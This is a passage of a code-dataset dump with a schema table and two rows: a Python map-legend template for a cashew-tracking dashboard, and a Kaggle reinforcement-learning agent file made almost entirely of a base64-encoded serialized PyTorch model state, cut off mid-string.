Schema (column name and dtype):

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
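A table with this schema can be inspected directly with pandas; a minimal sketch, assuming the rows are stored as a Parquet file (the file name below is hypothetical, the column names come from the schema above):

```python
import pandas as pd

# Hypothetical file name; any Parquet/Arrow dump with the schema above works the same way.
df = pd.read_parquet("code_sample.parquet")

# Check the declared column types.
print(df.dtypes)

# Example filter: Python rows not flagged as encoded data, with modest line length.
mask = (
    (df["lang"] == "Python")
    & (df["qsc_code_cate_encoded_data_quality_signal"] == 0)
    & (df["max_line_length"] <= 120)
)
print(df.loc[mask, ["max_stars_repo_name", "max_stars_repo_path", "size"]])
```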
First example row (metadata fields):

| Field | Value |
|---|---|
| hexsha | 8387ea3e14246f9daa7aa84c61d4b9e503a87db6 |
| size | 5,702 |
| ext | py |
| lang | Python |
| max_stars_repo_path | apps/dashboard/map_legend.py |
| max_stars_repo_name | TechnoServe/Caju-Dashboard-v2 |
| max_stars_repo_head_hexsha | 7345cbfc677f60665276437dbe0a68a992b03b17 |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | null |
| max_stars_repo_stars_event_min_datetime | null |
| max_stars_repo_stars_event_max_datetime | null |
| max_issues_repo_path | apps/dashboard/map_legend.py |
| max_issues_repo_name | TechnoServe/Caju-Dashboard-v2 |
| max_issues_repo_head_hexsha | 7345cbfc677f60665276437dbe0a68a992b03b17 |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | null |
| max_issues_repo_issues_event_min_datetime | null |
| max_issues_repo_issues_event_max_datetime | null |
| max_forks_repo_path | apps/dashboard/map_legend.py |
| max_forks_repo_name | TechnoServe/Caju-Dashboard-v2 |
| max_forks_repo_head_hexsha | 7345cbfc677f60665276437dbe0a68a992b03b17 |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | null |
| max_forks_repo_forks_event_min_datetime | null |
| max_forks_repo_forks_event_max_datetime | null |

content (Python source of apps/dashboard/map_legend.py):
from branca.element import Template, MacroElement

# HTML/CSS/JS template for a draggable map legend with French labels.
template_fr = """
{% macro html(this, kwargs) %}
<!doctype html>
<html lang="fr">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
<script src="https://code.jquery.com/jquery-1.12.4.js"></script>
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
<script>
$( function() {
$( "#maplegend" ).draggable({
start: function (event, ui) {
$(this).css({
right: "auto",
top: "auto",
bottom: "auto"
});
}
});
});
</script>
</head>
<body>
<div id='maplegend' class='maplegend'
style='position: absolute; z-index:9999; border:2px solid grey; background-color:rgba(255, 255, 255, 0.8);
border-radius:6px; padding: 10px; font-size:14px; right: 20px; bottom: 20px;'>
<div class='legend-title'>Legende</div>
<div class='legend-scale'>
<ul class='legend-labels'>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-warehouse&size=25&hoffset=0&voffset=-1
&background=1167b1"> Entrepot de cajoux</li>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-globe-africa&size=25&hoffset=0&voffset
=-1&background=008000"> Plantation</li>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-leaf&size=25&hoffset=0&voffset=-1
&background=c63e2b"> Pépinière</li>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-warehouse&size=25&hoffset=0&voffset=-1
&background=DBA800"> Lieu d'Apprentissage</li>
<li> <img src="https://i.ibb.co/J3L37CV/Picture3.png" width="17" height="24"> Prédictions
satellitaire</li>
</ul>
</div>
</div>
</body>
</html>
<style type='text/css'>
.maplegend .legend-title {
text-align: left;
margin-bottom: 5px;
font-weight: bold;
font-size: 90%;
}
.maplegend .legend-scale ul {
margin: 0 0 5px;
padding: 0;
float: left;
list-style: none;
}
.maplegend .legend-scale ul li {
font-size: 80%;
list-style: none;
margin-left: 0;
line-height: 18px;
margin-bottom: 2px;
}
.maplegend ul.legend-labels li span {
display: block;
float: left;
height: 16px;
width: 30px;
margin-right: 5px;
margin-left: 0;
border: 1px solid #999;
}
.maplegend .legend-source {
font-size: 80%;
color: #777;
clear: both;
}
.maplegend a {
color: #777;
}
</style>
{% endmacro %}"""
# Same legend template with English labels.
template_en = """
{% macro html(this, kwargs) %}
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
<script src="https://code.jquery.com/jquery-1.12.4.js"></script>
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
<script>
$( function() {
$( "#maplegend" ).draggable({
start: function (event, ui) {
$(this).css({
right: "auto",
top: "auto",
bottom: "auto"
});
}
});
});
</script>
</head>
<body>
<div id='maplegend' class='maplegend'
style='position: absolute; z-index:9999; border:2px solid grey; background-color:rgba(255, 255, 255, 0.8);
border-radius:6px; padding: 10px; font-size:14px; right: 20px; bottom: 20px;'>
<div class='legend-title'>Legend</div>
<div class='legend-scale'>
<ul class='legend-labels'>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-warehouse&size=25&hoffset=0&voffset=-1
&background=1167b1"> Cashew Warehouse</li>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-globe-africa&size=25&hoffset=0&voffset
=-1&background=008000"> Plantation Location</li>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-leaf&size=25&hoffset=0&voffset=-1
&background=c63e2b"> Nursery</li>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-warehouse&size=25&hoffset=0&voffset=-1
&background=DBA800"> Training Location</li>
<li> <img src="https://i.ibb.co/J3L37CV/Picture3.png" width="17" height="24"> Satellite
predictions</li>
</ul>
</div>
</div>
</body>
</html>
<style type='text/css'>
.maplegend .legend-title {
text-align: left;
margin-bottom: 5px;
font-weight: bold;
font-size: 90%;
}
.maplegend .legend-scale ul {
margin: 0 0 5px;
padding: 0;
float: left;
list-style: none;
}
.maplegend .legend-scale ul li {
font-size: 80%;
list-style: none;
margin-left: 0;
line-height: 18px;
margin-bottom: 2px;
}
.maplegend ul.legend-labels li span {
display: block;
float: left;
height: 16px;
width: 30px;
margin-right: 5px;
margin-left: 0;
border: 1px solid #999;
}
.maplegend .legend-source {
font-size: 80%;
color: #777;
clear: both;
}
.maplegend a {
color: #777;
}
</style>
{% endmacro %}"""
# Wrap each template in a MacroElement so the legend can be injected into a folium/branca map.
macro_fr = MacroElement()
macro_fr._template = Template(template_fr)
macro_en = MacroElement()
macro_en._template = Template(template_en)
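The file defines the two legend macros but does not show how they are attached to a map. A minimal usage sketch, assuming folium is installed; the coordinates and output file name are arbitrary examples, not part of the original file:

```python
import folium

# Create a map and inject the English legend (use macro_fr for the French one).
m = folium.Map(location=[9.3, 2.3], zoom_start=7)
m.get_root().add_child(macro_en)
m.save("map_with_legend.html")
```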
Remaining fields of the first row (line statistics and quality signals):

| Field | Value |
|---|---|
| avg_line_length | 28.79798 |
| max_line_length | 116 |
| alphanum_fraction | 0.601543 |
| qsc_code_num_words_quality_signal | 769 |
| qsc_code_num_chars_quality_signal | 5,702 |
| qsc_code_mean_word_length_quality_signal | 4.447334 |
| qsc_code_frac_words_unique_quality_signal | 0.210663 |
| qsc_code_frac_chars_top_2grams_quality_signal | 0.032749 |
| qsc_code_frac_chars_top_3grams_quality_signal | 0.032164 |
| qsc_code_frac_chars_top_4grams_quality_signal | 0.030409 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | 0.908772 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | 0.908772 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | 0.908772 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | 0.908772 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | 0.908772 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | 0.908772 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | 0 |
| qsc_code_frac_chars_digital_quality_signal | 0.052995 |
| qsc_code_frac_chars_whitespace_quality_signal | 0.212382 |
| qsc_code_size_file_byte_quality_signal | 5,702 |
| qsc_code_num_lines_quality_signal | 197 |
| qsc_code_num_chars_line_max_quality_signal | 117 |
| qsc_code_num_chars_line_mean_quality_signal | 28.944162 |
| qsc_code_frac_chars_alphabet_quality_signal | 0.708528 |
| qsc_code_frac_chars_comments_quality_signal | 0 |
| qsc_code_cate_xml_start_quality_signal | 0 |
| qsc_code_frac_lines_dupe_lines_quality_signal | 0.8 |
| qsc_code_cate_autogen_quality_signal | 0 |
| qsc_code_frac_lines_long_string_quality_signal | 0.114286 |
| qsc_code_frac_chars_string_length_quality_signal | 0.958962 |
| qsc_code_frac_chars_long_word_length_quality_signal | 0.140652 |
| qsc_code_frac_lines_string_concat_quality_signal | 0 |
| qsc_code_cate_encoded_data_quality_signal | 0 |
| qsc_code_frac_chars_hex_words_quality_signal | 0 |
| qsc_code_frac_lines_prompt_comments_quality_signal | 0 |
| qsc_code_frac_lines_assert_quality_signal | 0 |
| qsc_codepython_cate_ast_quality_signal | 1 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | 0 |
| qsc_codepython_cate_var_zero_quality_signal | false |
| qsc_codepython_frac_lines_pass_quality_signal | 0 |
| qsc_codepython_frac_lines_import_quality_signal | 0.005714 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | 0 |
| qsc_codepython_score_lines_no_logic_quality_signal | 0.005714 |
| qsc_codepython_frac_lines_print_quality_signal | 0 |
| qsc_code_num_words | 0 |
| qsc_code_num_chars | 0 |
| qsc_code_mean_word_length | 0 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | 0 |
| qsc_code_frac_chars_top_3grams | 0 |
| qsc_code_frac_chars_top_4grams | 0 |
| qsc_code_frac_chars_dupe_5grams | 1 |
| qsc_code_frac_chars_dupe_6grams | 1 |
| qsc_code_frac_chars_dupe_7grams | 1 |
| qsc_code_frac_chars_dupe_8grams | 1 |
| qsc_code_frac_chars_dupe_9grams | 1 |
| qsc_code_frac_chars_dupe_10grams | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 |
| qsc_code_frac_chars_digital | 0 |
| qsc_code_frac_chars_whitespace | 0 |
| qsc_code_size_file_byte | 0 |
| qsc_code_num_lines | 0 |
| qsc_code_num_chars_line_max | 0 |
| qsc_code_num_chars_line_mean | 0 |
| qsc_code_frac_chars_alphabet | 0 |
| qsc_code_frac_chars_comments | 0 |
| qsc_code_cate_xml_start | 0 |
| qsc_code_frac_lines_dupe_lines | 1 |
| qsc_code_cate_autogen | 0 |
| qsc_code_frac_lines_long_string | 0 |
| qsc_code_frac_chars_string_length | 1 |
| qsc_code_frac_chars_long_word_length | 0 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | 0 |
| qsc_code_frac_chars_hex_words | 0 |
| qsc_code_frac_lines_prompt_comments | 0 |
| qsc_code_frac_lines_assert | 0 |
| qsc_codepython_cate_ast | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 |
| qsc_codepython_cate_var_zero | 0 |
| qsc_codepython_frac_lines_pass | 0 |
| qsc_codepython_frac_lines_import | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 |
| qsc_codepython_score_lines_no_logic | 0 |
| qsc_codepython_frac_lines_print | 0 |
| effective | 0 |
| hits | 8 |
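For orientation, a few of the simpler fields above can be recomputed from a row's `content` string. This is an illustrative sketch only; the dataset's actual definitions may differ, for example in how empty lines or newlines are counted:

```python
from collections import Counter

def simple_signals(content: str) -> dict:
    """Plausible re-implementations of a few per-file statistics."""
    lines = content.splitlines()
    line_counts = Counter(lines)
    n_lines = max(len(lines), 1)
    n_chars = max(len(content), 1)
    return {
        "avg_line_length": sum(len(line) for line in lines) / n_lines,
        "max_line_length": max((len(line) for line in lines), default=0),
        "alphanum_fraction": sum(c.isalnum() for c in content) / n_chars,
        # Fraction of lines whose exact text occurs more than once in the file.
        "frac_lines_dupe_lines": sum(1 for line in lines if line_counts[line] > 1) / n_lines,
    }
```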
Second example row (metadata fields):

| Field | Value |
|---|---|
| hexsha | 83e1d3700dc2d3281b808c2622bdc3d762c3f696 |
| size | 357,594 |
| ext | py |
| lang | Python |
| max_stars_repo_path | rl_agents/a3c_agent_v1_deterministic.py |
| max_stars_repo_name | IsaiahPressman/Kaggle_Santa_2020 |
| max_stars_repo_head_hexsha | ff5c6aa78dbe234cef338f4c721cc30d7dbc3df8 |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | null |
| max_stars_repo_stars_event_min_datetime | null |
| max_stars_repo_stars_event_max_datetime | null |
| max_issues_repo_path | rl_agents/a3c_agent_v1_deterministic.py |
| max_issues_repo_name | IsaiahPressman/Kaggle_Santa_2020 |
| max_issues_repo_head_hexsha | ff5c6aa78dbe234cef338f4c721cc30d7dbc3df8 |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | null |
| max_issues_repo_issues_event_min_datetime | null |
| max_issues_repo_issues_event_max_datetime | null |
| max_forks_repo_path | rl_agents/a3c_agent_v1_deterministic.py |
| max_forks_repo_name | IsaiahPressman/Kaggle_Santa_2020 |
| max_forks_repo_head_hexsha | ff5c6aa78dbe234cef338f4c721cc30d7dbc3df8 |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | null |
| max_forks_repo_forks_event_min_datetime | null |
| max_forks_repo_forks_event_max_datetime | null |
content (Python source of rl_agents/a3c_agent_v1_deterministic.py, truncated in this extract). The file opens with

serialized_string = b'gAN9cQBYEAAAAG1vZGVsX3N0YXRlX2RpY3RxAWNjb2xsZWN0aW9ucwpPcmRlcmVkRGljdApxAilScQMo...'

a bytes literal holding a base64-encoded, pickled PyTorch checkpoint: the decoded prefix names a model_state_dict built as a collections.OrderedDict of torch.FloatStorage tensors (e.g. base.0.message_passing_mat). Several hundred kilobytes of the base64 payload follow and are cut off mid-value here, and the remaining fields of this row are not present in the extract.
PLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV
+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAAHEHhXEIUnEJSwBLZEtkhnEKS2RLAYZxC4loAilScQx0cQ1ScQ5YIAAAAGJhc2UuMC50cmFuc2Zvcm1fZmVhdHVyZXMud2VpZ2h0cQ9oBShoBkK7AQAAgAKKCmz8nEb5IGqoUBkugAJN6QMugAJ9cQAoWBAAAABwcm90b2NvbF92ZXJzaW9ucQFN6QNYDQAAAGxpdHRsZV9lbmRpYW5xAohYCgAAAHR5cGVfc2l6ZXNxA31xBChYBQAAAHNob3J0cQVLAlgDAAAAaW50cQZLBFgEAAAAbG9uZ3EHSwR1dS6AAihYBwAAAHN0b3JhZ2VxAGN0b3JjaApGbG9hdFN0b3JhZ2UKcQFYDgAAADk0NTAzNjQwMDk2NDQ4cQJYAwAAAGNwdXEDSzBOdHEEUS6AAl1xAFgOAAAAOTQ1MDM2NDAwOTY0NDhxAWEuMAAAAAAAAAAAHK49wBmvvp5jGD4qyaW7FDk1P9waaz0jtwI/vL8+PABFwb7bQqe+c0YWvskHg72MUoQ+B1b2PYxGnr5W/l++sbmfPXbICz+p4qM+njItvldUmz4p0oK+Z4GsPpLJeb7+H709on7qPTCmsDxWL7O85zWGvniuCz8EaL6+cJUwPu/XCT8UP64+DvS0Pd4HhT6ADtu9gwMFvoO9lz1Dh4o9GqCGPm0rcLyw9hQ8N+oYvthvvL331qI+PE/hvbIT7LtxEIVxEVJxEksASxBLA4ZxE0sDSwGGcRSJaAIpUnEVdHEWUnEXWB4AAABiYXNlLjAudHJhbnNmb3JtX2ZlYXR1cmVzLmJpYXNxGGgFKGgGQjsBAACAAooKbPycRvkgaqhQGS6AAk3pAy6AAn1xAChYEAAAAHByb3RvY29sX3ZlcnNpb25xAU3pA1gNAAAAbGl0dGxlX2VuZGlhbnECiFgKAAAAdHlwZV9zaXplc3EDfXEEKFgFAAAAc2hvcnRxBUsCWAMAAABpbnRxBksEWAQAAABsb25ncQdLBHV1LoACKFgHAAAAc3RvcmFnZXEAY3RvcmNoCkZsb2F0U3RvcmFnZQpxAVgOAAAAOTQ1MDM2Mzk5MDMyODBxAlgDAAAAY3B1cQNLEE50cQRRLoACXXEAWA4AAAA5NDUwMzYzOTkwMzI4MHEBYS4QAAAAAAAAAKLRKD4xrM29kbEBPAAAAADHP9w6erekPb2b1rrE/IK9F5mSvtY5jzwUSy0+arsDPAAAAA